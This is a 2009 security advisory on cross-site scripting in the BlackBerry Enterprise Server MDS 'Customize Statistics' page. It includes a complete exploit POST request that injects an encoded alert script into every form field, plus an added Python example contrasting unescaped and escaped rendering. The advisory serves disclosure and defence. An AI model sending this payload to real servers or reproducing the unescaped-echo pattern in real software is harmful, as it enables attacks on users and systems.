ERNW Security Advisory 01-2009
XSS in Blackberries Mobile Data Service Connection Service
Author: Michael Thumann

1. Summary

The Blackberry Mobile Data Service Connection is vulnerable to several XSS attacks in the "Customize Statistics" page.

2. CVSS V2 Base Score

3.5 (based on vendor rating)

3. Products affected

Blackberry Enterprise Server: all versions prior to 4.1.6 MR4

4. Patch Availability

A patch is available from the vendor.

5. Details

Injecting scripts (containing standard and encoded XSS attacks) into all the fields of the "Customize Statistics" page reveals that none of the fields are properly validated for malicious input and the output isn't sanitized.

6. Solution

Update the affected products to the current version (4.1.6 MR4 or later).

7. Time-Line

16 Feb 2009: Discovery of the vulnerability
02 Mar 2009: Vulnerability reported to vendor
02 Mar 2009: Answer from vendor
16 Apr 2009: Patch available
16 Apr 2009: Public Disclosure

8. Exploit

POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

(The request body is one line; it is wrapped here after each "&" for readability.)

9. Thanks

We would like to thank the guys from Blackberry for working together on this issue in a professional and responsible way.

10. Disclaimer

The information in this advisory is provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory.
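Added illustration (not part of the ERNW advisory and not Blackberry's code): the form field names and the URL-encoded payload are taken from the request in section 8; the two hypothetical rendering functions show the unescaped echo that makes the "Customize Statistics" page exploitable next to the output-encoded form that neutralises the same payload.

```python
import html
from urllib.parse import parse_qs

# Constructed copy of the request body from section 8: every field of the
# statistics form carries the same URL-encoded payload.
FIELDS = ["customDate", "interval", "lastCustomInterval", "lastIntervalLength",
          "nextCustomInterval", "nextIntervalLength", "action",
          "delIntervalIndex", "addStatIndex", "delStatIndex", "referenceTime"]
PAYLOAD = "%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E"
BODY = "&".join(f"{name}={PAYLOAD}" for name in FIELDS)


def parse_body(body: str) -> dict:
    """URL-decode the form body into {field: value}, as the server sees it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(fields: dict) -> str:
    """Hypothetical rendering that echoes each submitted value back unescaped
    into a value="..." attribute: the decoded payload closes the attribute and
    the tag, so the injected <script> becomes live markup."""
    rows = [f'<input name="{k}" value="{v}">' for k, v in fields.items()]
    return "\n".join(rows)


def render_hardened(fields: dict) -> str:
    """Same form, but every value is HTML-escaped (quotes included) before it
    reaches the attribute context, so the payload stays inert text."""
    rows = [f'<input name="{html.escape(k)}" '
            f'value="{html.escape(v, quote=True)}">' for k, v in fields.items()]
    return "\n".join(rows)


def contains_active_script(rendered: str) -> bool:
    """Check used below: does a literal <script> tag survive into the page?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    decoded = parse_body(BODY)
    print("decoded customDate:", decoded["customDate"])
    print("vulnerable output has <script>:", contains_active_script(render_vulnerable(decoded)))
    print("hardened output has <script>:", contains_active_script(render_hardened(decoded)))
```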